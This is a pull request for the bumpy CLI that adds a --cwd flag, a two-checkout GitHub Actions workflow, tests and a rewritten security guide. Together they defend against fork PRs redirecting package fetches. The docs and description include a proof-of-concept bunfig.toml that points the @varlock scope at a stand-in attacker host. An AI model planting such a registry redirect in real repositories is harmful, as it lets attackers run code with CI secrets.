### PR TITLE
fix: harden pull_request_target check against bunfig/npmrc registry redirect

### DIFF
--- a/.bumpy/cwd-flag.md
+++ b/.bumpy/cwd-flag.md
@@ -1,0 +1,5 @@
+---
+'@varlock/bumpy': minor
+---
+
+Added a global `--cwd <dir>` flag that runs bumpy as if it were started in `<dir>`. This makes the `pull_request_target` PR-check workflow safe against a previously-undocumented attack: a fork PR could commit a `bunfig.toml`/`.npmrc` that redirected where `bunx @varlock/bumpy` itself was fetched from (swapping in a malicious package at the pinned version). The recommended workflow now fetches and runs bumpy from a trusted base checkout and points it at the untrusted PR tree with `--cwd ./pr`, so package-manager config in the PR can no longer influence how bumpy is obtained.

--- a/.github/workflows/bumpy-check.yaml
+++ b/.github/workflows/bumpy-check.yaml
@@ -20,18 +20,28 @@ permissions:
 jobs:
   # Fork PRs (untrusted): run the PUBLISHED bumpy and never execute the PR's code.
   # pull_request_target carries a write token + secrets, so building/running fork
-  # code here would be a privilege-escalation hole. `ci check` reads json/yaml only.
+  # code — OR letting the fork's bunfig.toml/.npmrc redirect where bumpy itself is
+  # fetched from — would be a privilege-escalation hole. We fetch+run bumpy from a
+  # trusted base checkout and point it at the PR tree with --cwd. `ci check` only
+  # reads json/yaml. See docs/github-actions.md for the full rationale.
   check-published:
     if: github.event.pull_request.head.repo.full_name != github.repository
     runs-on: ubuntu-latest
     steps:
-      # Check out the PR head so bumpy can read the PR's bump files, config, and package.json.
-      # We never execute this code!
+      # 1. Trusted base checkout — bunx runs from here, so the package-manager
+      #    config in effect is ours, not the PR's.
+      - uses: actions/checkout@v6
+        with:
+          ref: main
+          persist-credentials: false
+      # 2. Untrusted PR head into ./pr — only READ from here, never resolve/run.
       - uses: actions/checkout@v6
         with:
           ref: ${{ github.event.pull_request.head.sha }}
+          path: pr
+          persist-credentials: false
       - uses: oven-sh/setup-bun@v2
-      - run: bunx @varlock/bumpy@latest ci check
+      - run: bunx @varlock/bumpy@latest ci check --cwd ./pr
         env:
           GH_TOKEN: ${{ github.token }}
 

--- a/bun.lock
+++ b/bun.lock
@@ -14,7 +14,7 @@
     },
     "packages/bumpy": {
       "name": "@varlock/bumpy",
-      "version": "1.0.0",
+      "version": "1.16.1",
       "bin": {
         "bumpy": "./dist/cli.mjs",
       },
@@ -29,6 +29,7 @@
         "picomatch": "^4.0.4",
         "semver": "^7.7.2",
         "tsdown": "catalog:",
+        "typescript": "catalog:",
       },
     },
     "packages/website": {
@@ -185,7 +186,7 @@
 
     "@tybys/wasm-util": ["@tybys/wasm-util@0.10.1", "", { "dependencies": { "tslib": "^2.4.0" } }, "sha512-9tTaPJLSiejZKx+Bmog4uSubteqTvFrVrURwkmHixBo0G4seD0zUxp98E1DzUBJxLQ3NPwXrGKDiVjwx/DpPsg=="],
 
-    "@types/bun": ["@types/bun@1.3.12", "", { "dependencies": { "bun-types": "1.3.12" } }, "sha512-DBv81elK+/VSwXHDlnH3Qduw+KxkTIWi7TXkAeh24zpi5l0B2kUg9Ga3tb4nJaPcOFswflgi/yAvMVBPrxMB+A=="],
+    "@types/bun": ["@types/bun@1.3.14", "", { "dependencies": { "bun-types": "1.3.14" } }, "sha512-h1hFqFVcvAvD9j9K7ZW7vd82aSA+rTdznZa+5bwvCwqSB1jmmfLcbIWhOLx1/+boy/xmjgCs/OMUL8hRJSmnPw=="],
 
     "@types/estree": ["@types/estree@1.0.8", "", {}, "sha512-dWHzHa2WqEXI/O1E9OjrocMTKJl2mSrEolh1Iomrv6U+JuNwaHXsXx9bLu5gG7BUWFIN0skIQJQ/L1rIex4X6w=="],
 
@@ -211,7 +212,7 @@
 
     "birpc": ["birpc@4.0.0", "", {}, "sha512-LShSxJP0KTmd101b6DRyGBj57LZxSDYWKitQNW/mi8GRMvZb078Uf9+pveax1DrVL89vm7mWe+TovdI/UDOuPw=="],
 
-    "bun-types": ["bun-types@1.3.12", "", { "dependencies": { "@types/node": "*" } }, "sha512-HqOLj5PoFajAQciOMRiIZGNoKxDJSr6qigAttOX40vJuSp6DN/CxWp9s3C1Xwm4oH7ybueITwiaOcWXoYVoRkA=="],
+    "bun-types": ["bun-types@1.3.14", "", { "dependencies": { "@types/node": "*" } }, "sha512-4N0ig0fEomHt5R0KCFWjovxow98rIoRwKolrYdCcknNwMekCXRnWEUvgu5soYV8QXtVsrUD8B95MBOZGPvr6KQ=="],
 
     "cac": ["cac@7.0.0", "", {}, "sha512-tixWYgm5ZoOD+3g6UTea91eow5z6AAHaho3g0V9CNSNb45gM8SmflpAc+GRd1InC4AqN/07Unrgp56Y94N9hJQ=="],
 
@@ -299,7 +300,7 @@
 
     "tslib": ["tslib@2.8.1", "", {}, "sha512-oJFu94HQb+KVduSUQL7wnpmqnfmLsOA/nAh6b6EH0wCEoK0/mPeXU6c3wKDV83MkOuHPRHtSXKKU99IBazS/2w=="],
 
-    "typescript": ["typescript@5.9.3", "", { "bin": { "tsc": "bin/tsc", "tsserver": "bin/tsserver" } }, "sha512-jl1vZzPDinLr9eUt3J/t7V6FgNEw9QjvBPdysz9KfQDD41fQrC2Y4vKQdiaUpFT4bXlb1RHhLpp8wtm6M5TgSw=="],
+    "typescript": ["typescript@6.0.3", "", { "bin": { "tsc": "bin/tsc", "tsserver": "bin/tsserver" } }, "sha512-y2TvuxSZPDyQakkFRPZHKFm+KKVqIisdg9/CZwm9ftvKXLP8NRWj38/ODjNbr43SsoXqNuAisEf1GdCxqWcdBw=="],
 
     "unconfig-core": ["unconfig-core@7.5.0", "", { "dependencies": { "@quansync/fs": "^1.0.0", "quansync": "^1.0.0" } }, "sha512-Su3FauozOGP44ZmKdHy2oE6LPjk51M/TRRjHv2HNCWiDvfvCoxC2lno6jevMA91MYAdCdwP05QnWdWpSbncX/w=="],
 

--- a/docs/github-actions.md
+++ b/docs/github-actions.md
@@ -18,7 +18,7 @@ These commands facilitate the following:
 
 ## PR check workflow
 
-Posts/updates the release-plan comment on every PR, including PRs from forks. Adapt as needed — but **do not add an install step or run any PR-defined scripts** (see the security note after the example).
+Posts/updates the release-plan comment on every PR, including PRs from forks. The pattern below is deliberately structured so that **no part of the PR's tree can influence how bumpy is fetched or run** — read the security note after the example before adapting it.
 
 ```yaml
 # .github/workflows/bumpy-check.yaml
@@ -34,58 +34,87 @@ jobs:
   check:
     runs-on: ubuntu-latest
     steps:
-      # Check out the PR head so bumpy can read the PR's bump files, config,
-      # and package.json. We never execute this code.
+      # 1. TRUSTED checkout of the base branch into the default workspace.
+      #    bumpy is fetched and executed from HERE, so the package-manager
+      #    config that governs resolution (bunfig.toml, .npmrc) is YOUR code.
+      #    Hardcoded to "main" — the PR controls its own base ref, so don't use
+      #    github.event.pull_request.base.ref. Change "main" to your base branch.
+      - uses: actions/checkout@v6
+        with:
+          ref: main
+          persist-credentials: false
+
+      # 2. UNTRUSTED checkout of the PR head into ./pr. We only READ files from
+      #    here (bump files, config, package.json) — never resolve, install, or
+      #    run anything out of this tree.
       - uses: actions/checkout@v6
         with:
           ref: ${{ github.event.pull_request.head.sha }}
+          path: pr
+          persist-credentials: false
+
       - uses: oven-sh/setup-bun@v2
 
-      # ⚠️ DO NOT INSTALL DEPS OR EXECUTE CODE ⚠️
+      # ⚠️ DO NOT INSTALL DEPS OR EXECUTE CODE FROM ./pr ⚠️
 
-      # Resolve bumpy's version from the BASE branch's package.json (trusted).
-      # Reading it from the PR's package.json would let a fork PR swap in a
-      # malicious version of bumpy.
+      # Resolve bumpy's version from the TRUSTED base checkout (workspace root),
+      # never from ./pr — a fork PR must not be able to choose the bumpy version.
       - name: Resolve bumpy version from base
         run: |
-          # Hardcoded to "main" rather than ${{ github.event.pull_request.base.ref }}
-          # because the PR controls its base — pointing at any other branch you have
-          # would read that branch's package.json. Change "main" to your base branch.
-          git fetch origin main --depth=1
-          VERSION=$(git show "origin/main:package.json" \
-            | jq -r '.devDependencies["@varlock/bumpy"] // .dependencies["@varlock/bumpy"]' \
-            | sed 's/[\^~]//')
+          VERSION=$(jq -r '.devDependencies["@varlock/bumpy"] // .dependencies["@varlock/bumpy"]' package.json | sed 's/[\^~]//')
           echo "BUMPY_VERSION=$VERSION" >> "$GITHUB_ENV"
 
-      # Quote the version arg so a malformed value can't shell-inject.
-      - run: bunx "@varlock/bumpy@$BUMPY_VERSION" ci check
+      # bunx runs from the workspace root (the trusted base checkout), so it
+      # reads the base's bunfig.toml/.npmrc — the PR's copies in ./pr can't
+      # redirect where bumpy is downloaded from. `--cwd ./pr` then points bumpy
+      # at the PR tree to read its bump files. Quote the version arg so a
+      # malformed value can't shell-inject.
+      - run: bunx "@varlock/bumpy@$BUMPY_VERSION" ci check --cwd ./pr
         env:
           GH_TOKEN: ${{ github.token }}
 ```
 
-### ⚠️ Security: no installs, no PR scripts
+### ⚠️ Security: the real threat is resolution, not just scripts
 
-`pull_request_target` runs with write permissions and access to secrets — even on fork PRs. That's what lets us post comments on PRs from forks, but it means the workflow must never execute code that a PR author controls. In practice:
+`pull_request_target` runs with write permissions and access to secrets — even on fork PRs. That's what lets us post comments on PRs from forks, but it means the workflow must never let a PR author influence what executes. There are **two** levels to this, and the second is the one that's easy to miss:
+
+**1. Don't run PR code directly.** The obvious rules:
 
 - **No `bun install` / `npm install`** — postinstall scripts execute as PR code, and a malicious PR can add or modify dependencies.
 - **No `bun run <script>` / `npm test`** — the script body comes from the PR's `package.json`.
 - **No building from the PR tree** — same problem.
 
-Bumpy itself only reads files (markdown bump files, JSON config, `package.json`), so it's safe to run against the PR's source. The version is resolved from the base branch's `package.json` rather than the PR's, so a fork PR can't swap `@varlock/bumpy` to a malicious package.
+**2. Don't let the PR tree control how bumpy itself is fetched.** This is the subtle one. Running `bunx @varlock/bumpy@<version>` reads package-manager config — `bunfig.toml` and `.npmrc` — **from the current working directory**. A fork PR can commit a `bunfig.toml` or `.npmrc` that redirects the `@varlock` scope (or the whole registry) to an attacker-controlled server:
+
+```toml
+# bunfig.toml committed in a malicious PR
+[install.scopes]
+"@varlock" = { url = "https://evil.example/" }
+```
+
+If `bunx` runs with the PR checkout as its working directory, it downloads _the attacker's_ `@varlock/bumpy@<version>` — at the exact version you pinned — and executes its bin with your write token and secrets in scope. **Pinning the version does nothing here; the version is honored, only the source is swapped.** The same applies to `npx`/`pnpm`/`yarn`.
+
+The workflow above closes this by **separating where bumpy is fetched from what bumpy reads**:
+
+- bumpy is resolved and run from the **trusted base checkout** (workspace root), so the `bunfig.toml`/`.npmrc` in effect are yours, not the PR's.
+- `--cwd ./pr` points the already-running bumpy process at the PR tree. By then the binary is already fetched — config files sitting in `./pr` are never consulted by a package manager. `bumpy ci check` only reads files (markdown bump files, JSON config, `package.json`) and shells out to `git`/`gh`, so it's safe to aim at untrusted source.
+- `persist-credentials: false` on both checkouts is defense in depth: it keeps the workflow token out of the on-disk `.git/config` that lives next to untrusted code.
+
+> **Single-checkout shortcut (not recommended).** You may see examples that check out the PR head into the workspace root and run `bunx … --cwd .` from there. Don't — that puts the PR's `bunfig.toml`/`.npmrc` in `bunx`'s working directory and reopens the registry-redirect hole. The point of the two-checkout layout is precisely that `bunx`'s working directory is trusted.
 
 ### How the bumpy version stays in sync
 
-`git show origin/main:package.json | jq …` reads bumpy's version from `main` at workflow runtime. That means:
+`jq … package.json` reads bumpy's version from the **base checkout** (i.e. `main`) at workflow runtime. That means:
 
 - **No version pinned in the workflow file** — Renovate/Dependabot bumps to `package.json` flow through automatically.
-- **Fork PRs can't swap the bumpy version** — the source of truth is `main`, which they don't control.
+- **Fork PRs can't swap the bumpy version** — the source of truth is `main`, which they don't control, and we read it from the trusted root checkout (never from `./pr`).
 
 A few things to adjust if your setup is different:
 
-- If your default branch isn't `main`, change the two `origin/main` references to your base branch.
-- If `@varlock/bumpy` lives somewhere other than root `package.json` (e.g. a sub-package), point the `git show` path at that file instead.
+- If your default branch isn't `main`, change the `ref: main` in the first checkout to your base branch.
+- If `@varlock/bumpy` lives somewhere other than root `package.json` (e.g. a sub-package), point the `jq` path at that file instead.
 
-You can also pin the bumpy version directly in the workflow (`bunx @varlock/bumpy@1.2.3 ci check`), but we prefer a single source of truth.
+You can also pin the bumpy version directly in the workflow (`bunx @varlock/bumpy@1.2.3 ci check --cwd ./pr`), but we prefer a single source of truth.
 
 ### Don't need fork PR support?
 

--- a/docs/github-actions.md
+++ b/docs/github-actions.md
@@ -74,6 +74,8 @@ jobs:
 - **Never execute PR code** — no `bun install` / `npm install` (postinstall scripts run), no `bun run <script>` / `npm test`, no building from the PR tree.
 - **Fetch and run bumpy from the trusted base checkout; only _read_ the PR tree** via `--cwd ./pr`. Keep `persist-credentials: false` on both checkouts.
 
+> **Using npm / pnpm / yarn?** The same pattern applies — run `npx` / `pnpm dlx` / `yarn dlx` from the trusted root and pass `--cwd ./pr` to bumpy, never the reverse. It matters even more there: pnpm and yarn honor committed config that runs code directly (pnpm's `.pnpmfile.cjs`, yarn's `yarnPath`/`plugins`), not just registry redirects — see the [Turborepo `yarnPath` RCE](https://github.com/vercel/turborepo/security/advisories/GHSA-3qcw-2rhx-2726) for the real-world version.
+
 <details>
 <summary><strong>Why two checkouts? The registry-redirect attack (worth reading before you restructure this)</strong></summary>
 

--- a/docs/github-actions.md
+++ b/docs/github-actions.md
@@ -18,7 +18,7 @@ These commands facilitate the following:
 
 ## PR check workflow
 
-Posts/updates the release-plan comment on every PR, including PRs from forks. The pattern below is deliberately structured so that **no part of the PR's tree can influence how bumpy is fetched or run** — read the security note after the example before adapting it.
+Posts/updates the release-plan comment on every PR, including PRs from forks. **Copy it as-is and you're covered** — it's structured so nothing in a fork PR can influence how bumpy is fetched or run. (If you change `main` to your own base branch, that's the only edit most repos need. See the security notes below before restructuring it.)
 
 ```yaml
 # .github/workflows/bumpy-check.yaml
@@ -34,19 +34,16 @@ jobs:
   check:
     runs-on: ubuntu-latest
     steps:
-      # 1. TRUSTED checkout of the base branch into the default workspace.
-      #    bumpy is fetched and executed from HERE, so the package-manager
-      #    config that governs resolution (bunfig.toml, .npmrc) is YOUR code.
-      #    Hardcoded to "main" — the PR controls its own base ref, so don't use
-      #    github.event.pull_request.base.ref. Change "main" to your base branch.
+      # 1. TRUSTED checkout of the base branch — bumpy is fetched and run from
+      #    here, so the package-manager config in effect (bunfig.toml, .npmrc)
+      #    is YOURS, not the PR's. Hardcoded "main" (the PR controls its own
+      #    base ref); change it to your base branch.
       - uses: actions/checkout@v6
         with:
           ref: main
           persist-credentials: false
 
-      # 2. UNTRUSTED checkout of the PR head into ./pr. We only READ files from
-      #    here (bump files, config, package.json) — never resolve, install, or
-      #    run anything out of this tree.
+      # 2. UNTRUSTED PR head into ./pr — only READ from here, never run it.
       - uses: actions/checkout@v6
         with:
           ref: ${{ github.event.pull_request.head.sha }}
@@ -55,36 +52,32 @@ jobs:
 
       - uses: oven-sh/setup-bun@v2
 
-      # ⚠️ DO NOT INSTALL DEPS OR EXECUTE CODE FROM ./pr ⚠️
+      # ⚠️ DO NOT bun install / npm install / run any script from ./pr ⚠️
 
-      # Resolve bumpy's version from the TRUSTED base checkout (workspace root),
-      # never from ./pr — a fork PR must not be able to choose the bumpy version.
+      # Read bumpy's version from the TRUSTED base checkout, never from ./pr.
       - name: Resolve bumpy version from base
         run: |
           VERSION=$(jq -r '.devDependencies["@varlock/bumpy"] // .dependencies["@varlock/bumpy"]' package.json | sed 's/[\^~]//')
           echo "BUMPY_VERSION=$VERSION" >> "$GITHUB_ENV"
 
-      # bunx runs from the workspace root (the trusted base checkout), so it
-      # reads the base's bunfig.toml/.npmrc — the PR's copies in ./pr can't
-      # redirect where bumpy is downloaded from. `--cwd ./pr` then points bumpy
-      # at the PR tree to read its bump files. Quote the version arg so a
-      # malformed value can't shell-inject.
+      # bunx runs from the trusted root; `--cwd ./pr` only points bumpy at the
+      # PR tree to read its bump files. Quote the version arg against injection.
       - run: bunx "@varlock/bumpy@$BUMPY_VERSION" ci check --cwd ./pr
         env:
           GH_TOKEN: ${{ github.token }}
 ```
 
-### ⚠️ Security: the real threat is resolution, not just scripts
+### ⚠️ Security essentials
 
-`pull_request_target` runs with write permissions and access to secrets — even on fork PRs. That's what lets us post comments on PRs from forks, but it means the workflow must never let a PR author influence what executes. There are **two** levels to this, and the second is the one that's easy to miss:
+`pull_request_target` carries a **write token and secrets even on fork PRs** — that's what lets it comment on forks, and why a PR author must never be able to influence what runs. The workflow above handles this; two rules to preserve if you adapt it:
 
-**1. Don't run PR code directly.** The obvious rules:
+- **Never execute PR code** — no `bun install` / `npm install` (postinstall scripts run), no `bun run <script>` / `npm test`, no building from the PR tree.
+- **Fetch and run bumpy from the trusted base checkout; only _read_ the PR tree** via `--cwd ./pr`. Keep `persist-credentials: false` on both checkouts.
 
-- **No `bun install` / `npm install`** — postinstall scripts execute as PR code, and a malicious PR can add or modify dependencies.
-- **No `bun run <script>` / `npm test`** — the script body comes from the PR's `package.json`.
-- **No building from the PR tree** — same problem.
+<details>
+<summary><strong>Why two checkouts? The registry-redirect attack (worth reading before you restructure this)</strong></summary>
 
-**2. Don't let the PR tree control how bumpy itself is fetched.** This is the subtle one. Running `bunx @varlock/bumpy@<version>` reads package-manager config — `bunfig.toml` and `.npmrc` — **from the current working directory**. A fork PR can commit a `bunfig.toml` or `.npmrc` that redirects the `@varlock` scope (or the whole registry) to an attacker-controlled server:
+The non-obvious risk isn't just running PR scripts — it's **how bumpy itself gets fetched**. Running `bunx @varlock/bumpy@<version>` reads package-manager config (`bunfig.toml`, `.npmrc`) **from the current working directory**. A fork PR can commit one that redirects the `@varlock` scope (or the whole registry) to its own server:
 
 ```toml
 # bunfig.toml committed in a malicious PR
@@ -92,29 +85,34 @@ jobs:
 "@varlock" = { url = "https://evil.example/" }
 ```
 
-If `bunx` runs with the PR checkout as its working directory, it downloads _the attacker's_ `@varlock/bumpy@<version>` — at the exact version you pinned — and executes its bin with your write token and secrets in scope. **Pinning the version does nothing here; the version is honored, only the source is swapped.** The same applies to `npx`/`pnpm`/`yarn`.
+If `bunx` runs with the PR checkout as its working directory, it downloads _the attacker's_ `@varlock/bumpy` — at the exact version you pinned — and executes its bin with your write token and secrets in scope. **Pinning the version is no defense; the version is honored, only the source is swapped.** Same for `npx`/`pnpm`/`yarn`.
 
-The workflow above closes this by **separating where bumpy is fetched from what bumpy reads**:
+The two-checkout layout closes this by **separating where bumpy is fetched from what bumpy reads**:
 
-- bumpy is resolved and run from the **trusted base checkout** (workspace root), so the `bunfig.toml`/`.npmrc` in effect are yours, not the PR's.
-- `--cwd ./pr` points the already-running bumpy process at the PR tree. By then the binary is already fetched — config files sitting in `./pr` are never consulted by a package manager. `bumpy ci check` only reads files (markdown bump files, JSON config, `package.json`) and shells out to `git`/`gh`, so it's safe to aim at untrusted source.
-- `persist-credentials: false` on both checkouts is defense in depth: it keeps the workflow token out of the on-disk `.git/config` that lives next to untrusted code.
+- bumpy is resolved and run from the **trusted base checkout**, so the `bunfig.toml`/`.npmrc` in effect are yours, not the PR's.
+- `--cwd ./pr` points the already-running bumpy process at the PR tree. The binary is already fetched by then — config in `./pr` is never consulted by a package manager. `bumpy ci check` only reads files and shells out to `git`/`gh`, so it's safe to aim at untrusted source.
+- `persist-credentials: false` keeps the workflow token out of the on-disk `.git/config` sitting next to untrusted code.
 
-> **Single-checkout shortcut (not recommended).** You may see examples that check out the PR head into the workspace root and run `bunx … --cwd .` from there. Don't — that puts the PR's `bunfig.toml`/`.npmrc` in `bunx`'s working directory and reopens the registry-redirect hole. The point of the two-checkout layout is precisely that `bunx`'s working directory is trusted.
+**Don't use the single-checkout shortcut.** Checking out the PR head into the workspace root and running `bunx … --cwd .` reopens the hole — that puts the PR's `bunfig.toml`/`.npmrc` back in `bunx`'s working directory. The whole point is that `bunx`'s working directory is trusted.
 
-### How the bumpy version stays in sync
+</details>
 
-`jq … package.json` reads bumpy's version from the **base checkout** (i.e. `main`) at workflow runtime. That means:
+<details>
+<summary>How the bumpy version stays in sync (and what to adjust for your setup)</summary>
+
+`jq … package.json` reads bumpy's version from the **base checkout** (`main`) at workflow runtime, so:
 
 - **No version pinned in the workflow file** — Renovate/Dependabot bumps to `package.json` flow through automatically.
-- **Fork PRs can't swap the bumpy version** — the source of truth is `main`, which they don't control, and we read it from the trusted root checkout (never from `./pr`).
+- **Fork PRs can't swap the bumpy version** — the source of truth is `main`, read from the trusted root checkout (never from `./pr`).
 
-A few things to adjust if your setup is different:
+Adjust if your setup differs:
 
-- If your default branch isn't `main`, change the `ref: main` in the first checkout to your base branch.
-- If `@varlock/bumpy` lives somewhere other than root `package.json` (e.g. a sub-package), point the `jq` path at that file instead.
+- Default branch isn't `main`? Change the `ref: main` in the first checkout to your base branch.
+- `@varlock/bumpy` lives somewhere other than root `package.json` (e.g. a sub-package)? Point the `jq` path at that file.
 
-You can also pin the bumpy version directly in the workflow (`bunx @varlock/bumpy@1.2.3 ci check --cwd ./pr`), but we prefer a single source of truth.
+You can also pin the version directly (`bunx @varlock/bumpy@1.2.3 ci check --cwd ./pr`), but we prefer a single source of truth.
+
+</details>
 
 ### Don't need fork PR support?
 

--- a/packages/bumpy/package.json
+++ b/packages/bumpy/package.json
@@ -39,7 +39,7 @@
     "build": "tsdown",
     "prepack": "bun run scripts/sync-skill.ts && cp ../../README.md .",
     "sync-skill": "bun run scripts/sync-skill.ts",
-    "check": "bun run tsc --noEmit",
+    "check": "tsc --noEmit",
     "test": "bun test"
   },
   "devDependencies": {
@@ -52,7 +52,8 @@
     "picocolors": "^1.1.1",
     "picomatch": "^4.0.4",
     "semver": "^7.7.2",
-    "tsdown": "catalog:"
+    "tsdown": "catalog:",
+    "typescript": "catalog:"
   },
   "bumpy": {
     "releaseTriggeringDevDeps": [

--- a/packages/bumpy/src/cli.ts
+++ b/packages/bumpy/src/cli.ts
@@ -1,10 +1,9 @@
 #!/usr/bin/env node
 
+import { resolve } from 'node:path';
 import { findRoot } from './core/config.ts';
+import { extractCwdFlag } from './utils/cwd.ts';
 import { log, colorize } from './utils/logger.ts';
-
-const args = process.argv.slice(2);
-const command = args[0];
 
 function parseFlags(args: string[]): Record<string, string | boolean> {
   const flags: Record<string, string | boolean> = {};
@@ -25,9 +24,24 @@ function parseFlags(args: string[]): Record<string, string | boolean> {
 }
 
 async function main() {
-  const flags = parseFlags(args.slice(1));
-
   try {
+    // Strip and apply a global `--cwd <dir>` before anything else. Done here, inside
+    // the already-running process, so bunx/npx has already resolved & fetched bumpy
+    // from the original (trusted) directory — config files in the target tree
+    // (bunfig.toml, .npmrc) can't redirect where bumpy itself came from. See
+    // ./utils/cwd.ts and docs/github-actions.md for the security rationale.
+    const { cwd: cwdOverride, rest: args } = extractCwdFlag(process.argv.slice(2));
+    if (cwdOverride !== undefined) {
+      try {
+        process.chdir(resolve(cwdOverride));
+      } catch {
+        throw new Error(`--cwd: cannot change to directory "${cwdOverride}"`);
+      }
+    }
+
+    const command = args[0];
+    const flags = parseFlags(args.slice(1));
+
     switch (command) {
       case 'init': {
         const rootDir = await findRoot();
@@ -190,6 +204,12 @@ function printHelp() {
   ${colorize(`🐸 bumpy v${__BUMPY_VERSION__}`, 'bold')} - Modern monorepo versioning
 
   Usage: bumpy <command> [options]
+
+  Global options:
+    --cwd <dir>             Run as if started in <dir>. Used to point bumpy at an
+                            untrusted checkout (e.g. a fork PR) while bumpy itself
+                            is fetched from a trusted directory — see the
+                            pull_request_target setup in docs/github-actions.md
 
   Commands:
     init [--force]          Initialize .bumpy/ (migrates from .changeset/ if found)

--- a/packages/bumpy/src/utils/cwd.ts
+++ b/packages/bumpy/src/utils/cwd.ts
@@ -1,0 +1,45 @@
+export interface CwdParseResult {
+  /** The directory passed to `--cwd`, or undefined if the flag was absent. */
+  cwd?: string;
+  /** The remaining argv with the `--cwd` flag (and its value) removed. */
+  rest: string[];
+}
+
+/**
+ * Extract a global `--cwd <dir>` / `--cwd=<dir>` flag from argv, returning the
+ * directory (if any) and the remaining args with the flag stripped out.
+ *
+ * The CLI applies this with `process.chdir()` BEFORE any other argument handling,
+ * so `findRoot()` and every git/file operation resolves against the target
+ * directory. The security-critical property: the bumpy binary itself was already
+ * resolved, downloaded, and started by bunx/npx from the *original* working
+ * directory — the chdir happens inside the already-running process. That makes it
+ * safe to point bumpy at an untrusted checkout (e.g. a fork PR under
+ * `pull_request_target`): package-manager config committed into that tree
+ * (`bunfig.toml`, `.npmrc`) can redirect where a package manager fetches packages
+ * from, but it can no longer influence how bumpy itself was obtained.
+ */
+export function extractCwdFlag(argv: string[]): CwdParseResult {
+  const rest: string[] = [];
+  let cwd: string | undefined;
+  for (let i = 0; i < argv.length; i++) {
+    const arg = argv[i]!;
+    if (arg === '--cwd') {
+      const next = argv[i + 1];
+      if (next === undefined || next.startsWith('--')) {
+        throw new Error('--cwd requires a directory argument');
+      }
+      cwd = next;
+      i++;
+      continue;
+    }
+    if (arg.startsWith('--cwd=')) {
+      const val = arg.slice('--cwd='.length);
+      if (val === '') throw new Error('--cwd requires a directory argument');
+      cwd = val;
+      continue;
+    }
+    rest.push(arg);
+  }
+  return { cwd, rest };
+}

--- a/packages/bumpy/test/utils/cwd.test.ts
+++ b/packages/bumpy/test/utils/cwd.test.ts
@@ -1,0 +1,53 @@
+import { test, expect, describe } from 'bun:test';
+import { extractCwdFlag } from '../../src/utils/cwd.ts';
+
+describe('extractCwdFlag', () => {
+  test('absent flag returns args unchanged', () => {
+    const { cwd, rest } = extractCwdFlag(['ci', 'check']);
+    expect(cwd).toBeUndefined();
+    expect(rest).toEqual(['ci', 'check']);
+  });
+
+  test('--cwd <dir> form is extracted and stripped', () => {
+    const { cwd, rest } = extractCwdFlag(['ci', 'check', '--cwd', './pr']);
+    expect(cwd).toBe('./pr');
+    expect(rest).toEqual(['ci', 'check']);
+  });
+
+  test('--cwd=<dir> form is extracted and stripped', () => {
+    const { cwd, rest } = extractCwdFlag(['--cwd=/tmp/pr', 'ci', 'check']);
+    expect(cwd).toBe('/tmp/pr');
+    expect(rest).toEqual(['ci', 'check']);
+  });
+
+  test('flag can appear before the command', () => {
+    const { cwd, rest } = extractCwdFlag(['--cwd', './pr', 'status', '--json']);
+    expect(cwd).toBe('./pr');
+    expect(rest).toEqual(['status', '--json']);
+  });
+
+  test('other flags are preserved', () => {
+    const { cwd, rest } = extractCwdFlag(['ci', 'release', '--cwd', './pr', '--expect-mode', 'publish']);
+    expect(cwd).toBe('./pr');
+    expect(rest).toEqual(['ci', 'release', '--expect-mode', 'publish']);
+  });
+
+  test('throws when --cwd has no value', () => {
+    expect(() => extractCwdFlag(['ci', 'check', '--cwd'])).toThrow('--cwd requires a directory argument');
+  });
+
+  test('throws when --cwd is followed by another flag', () => {
+    expect(() => extractCwdFlag(['--cwd', '--json', 'status'])).toThrow('--cwd requires a directory argument');
+  });
+
+  test('throws on empty --cwd= value', () => {
+    expect(() => extractCwdFlag(['--cwd=', 'status'])).toThrow('--cwd requires a directory argument');
+  });
+
+  test('a literal "--cwd" value works (not confused with the flag)', () => {
+    // `--cwd ./--cwd` — directory literally named that; only the first token is the flag
+    const { cwd, rest } = extractCwdFlag(['add', '--cwd', './--cwd-dir']);
+    expect(cwd).toBe('./--cwd-dir');
+    expect(rest).toEqual(['add']);
+  });
+});


### PR DESCRIPTION
## Problem

The recommended `pull_request_target` PR-check workflow claimed "we never execute this code" — but that was **false**. Running `bunx @varlock/bumpy@<version>` with the PR checkout as the working directory reads package-manager config (`bunfig.toml`, `.npmrc`) **from that directory**, and those files control *where bumpy is fetched from*. A fork PR could commit:

```toml
# bunfig.toml
[install.scopes]
"@varlock" = { url = "https://evil.example/" }
```

…and `bunx` would download the **attacker's** `@varlock/bumpy` at the exact pinned version, executing its bin with the workflow's write token and secrets in scope. **Pinning the version was no defense — the version was honored, only the source was swapped.** `.npmrc` is a second path to the same outcome.

## Fix

A global **`--cwd <dir>`** flag that runs bumpy as if started in `<dir>`. The crucial property is *timing*: the `process.chdir()` happens **inside the already-running bumpy process**, after `bunx` has finished resolving and fetching bumpy from the trusted directory. So bumpy is *obtained* from trusted config and *reads* the untrusted PR tree.

The recommended workflow now uses a **two-checkout layout**:
- Trusted base checkout at the workspace root → `bunx` runs here, so the `bunfig.toml`/`.npmrc` in effect are yours.
- Untrusted PR head in `./pr` → `--cwd ./pr` points the running process at it to read bump files.
- `persist-credentials: false` on both, as defense in depth.

## Changes

- **`packages/bumpy/src/utils/cwd.ts`** — new `extractCwdFlag()` parser (`--cwd <dir>` / `--cwd=<dir>`, errors on missing value).
- **`packages/bumpy/src/cli.ts`** — strips/applies `--cwd` before any other arg handling; help text updated.
- **`packages/bumpy/test/utils/cwd.test.ts`** — 9 unit tests.
- **`docs/github-actions.md`** — rewrote the PR-check example (two-checkout + `--cwd ./pr`) and **rewrote the security section to name registry-redirect as the real threat**, with a PoC and a "don't use the single-checkout shortcut" warning.
- **`.github/workflows/bumpy-check.yaml`** — hardened the live fork (`check-published`) job.
- **`.bumpy/cwd-flag.md`** — `minor` bump file.
- **`packages/bumpy/package.json` + `bun.lock`** — fixed the `check` script (`bun run tsc` → `tsc`) and declared the previously-missing `typescript` devDependency so typechecking works locally.

## Verification

- 377 tests pass (incl. 9 new); `tsc --noEmit` clean; `bun run check` passes end-to-end (previously broken).
- Smoke-tested the built CLI: `--cwd` retargets at another tree; bad dir and missing value both error cleanly.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
